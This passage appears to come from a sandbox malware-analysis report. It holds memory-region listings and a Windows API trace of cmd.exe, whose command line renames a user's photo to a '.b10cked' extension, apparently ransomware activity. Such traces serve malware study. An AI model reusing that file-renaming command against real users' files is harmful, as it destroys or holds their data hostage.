(normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 16745 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = 
mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 16746 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 16747 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 16748 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 16749 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 16750 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 16751 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 16752 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 16753 start_va = 0x3f0000 end_va = 0x4b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 16754 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: 
"c:\\windows\\system32\\imm32.dll") Region: id = 16755 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 16756 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 16757 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 16758 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 16759 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 16760 start_va = 0x4c0000 end_va = 0x5c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 16761 start_va = 0x5d0000 end_va = 0x11cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 16762 start_va = 0x11d0000 end_va = 0x1332fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011d0000" filename = "" Thread: id = 245 os_tid = 0xffc [0143.652] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fa44 | out: lpSystemTimeAsFileTime=0x24fa44*(dwLowDateTime=0x8f8dab40, dwHighDateTime=0x1d440a9)) [0143.652] GetCurrentProcessId () returned 0x6dc [0143.652] GetCurrentThreadId () returned 0xffc [0143.652] GetTickCount () returned 0x2ce07 [0143.652] QueryPerformanceCounter (in: lpPerformanceCount=0x24fa3c | out: lpPerformanceCount=0x24fa3c*=20044111979) returned 1 [0143.653] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0143.653] __set_app_type (_Type=0x1) [0143.653] __p__fmode () returned 0x76b331f4 [0143.653] __p__commode () returned 0x76b331fc 
[0143.653] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0143.653] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0143.653] GetCurrentThreadId () returned 0xffc [0143.653] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xffc) returned 0x38 [0143.653] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0143.653] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0143.653] SetThreadUILanguage (LangId=0x0) returned 0x409 [0143.654] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0143.654] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24f9d4 | out: phkResult=0x24f9d4*=0x0) returned 0x2 [0143.654] VirtualQuery (in: lpAddress=0x24fa0b, lpBuffer=0x24f9a4, dwLength=0x1c | out: lpBuffer=0x24f9a4*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.654] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24f9a4, dwLength=0x1c | out: lpBuffer=0x24f9a4*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0143.654] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24f9a4, dwLength=0x1c | out: lpBuffer=0x24f9a4*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0143.654] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24f9a4, dwLength=0x1c | out: lpBuffer=0x24f9a4*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, 
Type=0x20000)) returned 0x1c [0143.654] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24f9a4, dwLength=0x1c | out: lpBuffer=0x24f9a4*(BaseAddress=0x250000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xa0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0143.654] GetConsoleOutputCP () returned 0x1b5 [0143.654] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0143.654] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0143.654] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.654] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0143.654] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.655] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0143.655] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.655] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0143.655] _get_osfhandle (_FileHandle=0) returned 0x3 [0143.655] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0143.655] _get_osfhandle (_FileHandle=0) returned 0x3 [0143.655] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0143.655] GetEnvironmentStringsW () returned 0x3001f8* [0143.656] FreeEnvironmentStringsW (penv=0x3001f8) returned 1 [0143.656] GetEnvironmentStringsW () returned 0x3001f8* [0143.656] FreeEnvironmentStringsW (penv=0x3001f8) returned 1 [0143.656] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24e944 | out: phkResult=0x24e944*=0x40) returned 0x0 [0143.656] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24e94c, lpData=0x24e950, lpcbData=0x24e948*=0x1000 | out: lpType=0x24e94c*=0x0, lpData=0x24e950*=0x88, lpcbData=0x24e948*=0x1000) returned 0x2 [0143.656] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24e94c, 
lpData=0x24e950, lpcbData=0x24e948*=0x1000 | out: lpType=0x24e94c*=0x4, lpData=0x24e950*=0x1, lpcbData=0x24e948*=0x4) returned 0x0 [0143.656] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24e94c, lpData=0x24e950, lpcbData=0x24e948*=0x1000 | out: lpType=0x24e94c*=0x0, lpData=0x24e950*=0x1, lpcbData=0x24e948*=0x1000) returned 0x2 [0143.656] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24e94c, lpData=0x24e950, lpcbData=0x24e948*=0x1000 | out: lpType=0x24e94c*=0x4, lpData=0x24e950*=0x0, lpcbData=0x24e948*=0x4) returned 0x0 [0143.656] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24e94c, lpData=0x24e950, lpcbData=0x24e948*=0x1000 | out: lpType=0x24e94c*=0x4, lpData=0x24e950*=0x40, lpcbData=0x24e948*=0x4) returned 0x0 [0143.656] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24e94c, lpData=0x24e950, lpcbData=0x24e948*=0x1000 | out: lpType=0x24e94c*=0x4, lpData=0x24e950*=0x40, lpcbData=0x24e948*=0x4) returned 0x0 [0143.656] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24e94c, lpData=0x24e950, lpcbData=0x24e948*=0x1000 | out: lpType=0x24e94c*=0x0, lpData=0x24e950*=0x40, lpcbData=0x24e948*=0x1000) returned 0x2 [0143.656] RegCloseKey (hKey=0x40) returned 0x0 [0143.656] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24e944 | out: phkResult=0x24e944*=0x40) returned 0x0 [0143.656] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24e94c, lpData=0x24e950, lpcbData=0x24e948*=0x1000 | out: lpType=0x24e94c*=0x0, lpData=0x24e950*=0x40, lpcbData=0x24e948*=0x1000) returned 0x2 [0143.656] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24e94c, lpData=0x24e950, lpcbData=0x24e948*=0x1000 | out: lpType=0x24e94c*=0x4, 
lpData=0x24e950*=0x1, lpcbData=0x24e948*=0x4) returned 0x0 [0143.657] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24e94c, lpData=0x24e950, lpcbData=0x24e948*=0x1000 | out: lpType=0x24e94c*=0x0, lpData=0x24e950*=0x1, lpcbData=0x24e948*=0x1000) returned 0x2 [0143.657] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24e94c, lpData=0x24e950, lpcbData=0x24e948*=0x1000 | out: lpType=0x24e94c*=0x4, lpData=0x24e950*=0x0, lpcbData=0x24e948*=0x4) returned 0x0 [0143.657] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24e94c, lpData=0x24e950, lpcbData=0x24e948*=0x1000 | out: lpType=0x24e94c*=0x4, lpData=0x24e950*=0x9, lpcbData=0x24e948*=0x4) returned 0x0 [0143.657] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24e94c, lpData=0x24e950, lpcbData=0x24e948*=0x1000 | out: lpType=0x24e94c*=0x4, lpData=0x24e950*=0x9, lpcbData=0x24e948*=0x4) returned 0x0 [0143.657] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24e94c, lpData=0x24e950, lpcbData=0x24e948*=0x1000 | out: lpType=0x24e94c*=0x0, lpData=0x24e950*=0x9, lpcbData=0x24e948*=0x1000) returned 0x2 [0143.657] RegCloseKey (hKey=0x40) returned 0x0 [0143.657] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886372 [0143.657] srand (_Seed=0x5b886372) [0143.657] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJHG5~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJhG5emgLWHUyVz.jpg.b10cked\"" [0143.657] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJHG5~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJhG5emgLWHUyVz.jpg.b10cked\"" [0143.657] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: 
lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0143.657] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x301958, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0143.658] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0143.658] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0143.658] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0143.658] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0143.658] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0143.658] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0143.658] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0143.658] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0143.658] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0143.658] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0143.658] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0143.658] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0143.658] GetEnvironmentStringsW () returned 0x302348* [0143.658] FreeEnvironmentStringsW (penv=0x302348) returned 1 [0143.658] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0143.658] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0143.658] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0143.658] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0143.658] 
_wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0143.658] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0143.658] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0143.658] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0143.658] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0143.658] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0143.659] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24f710 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0143.659] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x24f710, lpFilePart=0x24f70c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24f70c*="Desktop") returned 0x18 [0143.659] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0143.659] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f48c | out: lpFindFileData=0x24f48c) returned 0x3009d8 [0143.659] FindClose (in: hFindFile=0x3009d8 | out: hFindFile=0x3009d8) returned 1 [0143.659] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x24f48c | out: lpFindFileData=0x24f48c) returned 0x3009d8 [0143.659] FindClose (in: hFindFile=0x3009d8 | out: hFindFile=0x3009d8) returned 1 [0143.659] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x24f48c | out: lpFindFileData=0x24f48c) returned 0x3009d8 [0143.659] FindClose (in: hFindFile=0x3009d8 | out: hFindFile=0x3009d8) returned 1 [0143.660] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0143.660] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0143.660] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0143.660] GetEnvironmentStringsW () returned 0x3001f8* 
[0143.660] FreeEnvironmentStringsW (penv=0x3001f8) returned 1 [0143.660] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0143.660] GetConsoleOutputCP () returned 0x1b5 [0143.661] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0143.661] GetUserDefaultLCID () returned 0x409 [0143.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0143.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24f850, cchData=128 | out: lpLCData="0") returned 2 [0143.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24f850, cchData=128 | out: lpLCData="0") returned 2 [0143.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24f850, cchData=128 | out: lpLCData="1") returned 2 [0143.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0143.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0143.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0143.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0143.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0143.662] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0143.662] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0143.662] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0143.662] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 
[0143.662] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0143.662] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0143.663] GetConsoleTitleW (in: lpConsoleTitle=0x2f0920, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0143.663] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0143.663] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0143.663] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0143.663] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0143.664] _wcsicmp (_String1="move", _String2=")") returned 68 [0143.664] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0143.664] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0143.664] _wcsicmp (_String1="IF", _String2="move") returned -4 [0143.664] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0143.664] _wcsicmp (_String1="REM", _String2="move") returned 5 [0143.664] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0143.668] GetConsoleTitleW (in: lpConsoleTitle=0x24f548, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0143.890] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0143.890] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0143.890] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0143.890] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0143.890] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0143.890] _wcsicmp (_String1="move", _String2="CD") returned 10 [0143.890] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0143.890] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0143.890] _wcsicmp (_String1="move", _String2="REN") returned -5 [0143.890] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0143.890] 
_wcsicmp (_String1="move", _String2="SET") returned -6 [0143.890] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0143.890] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0143.890] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0143.890] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0143.890] _wcsicmp (_String1="move", _String2="MD") returned 11 [0143.890] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0143.890] _wcsicmp (_String1="move", _String2="RD") returned -5 [0143.890] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0143.890] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0143.890] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0143.890] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0143.890] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0143.890] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0143.890] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0143.890] _wcsicmp (_String1="move", _String2="VER") returned -9 [0143.890] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0143.890] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0143.890] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0143.890] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0143.890] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0143.890] _wcsicmp (_String1="move", _String2="START") returned -6 [0143.890] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0143.890] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0143.891] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0143.892] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0143.892] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0143.892] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24f304, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x24f2fc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, 
lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24f2fc*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0143.892] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0143.892] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0143.892] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) 
returned -13 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0143.893] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0143.894] _wcsicmp (_String1="EEJHG5~1.JPG", _String2=".") returned 55 [0143.894] _wcsicmp (_String1="EEJHG5~1.JPG", _String2="..") returned 55 [0143.894] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJHG5~1.JPG" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1\\eejhg5~1.jpg")) returned 0x20 [0143.894] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x301ef8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0143.894] SetErrorMode (uMode=0x0) returned 0x0 [0143.894] SetErrorMode (uMode=0x1) returned 0x0 [0143.894] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJHG5~1.JPG", nBufferLength=0x104, lpBuffer=0x24ec8c, lpFilePart=0x24ec74 | out: 
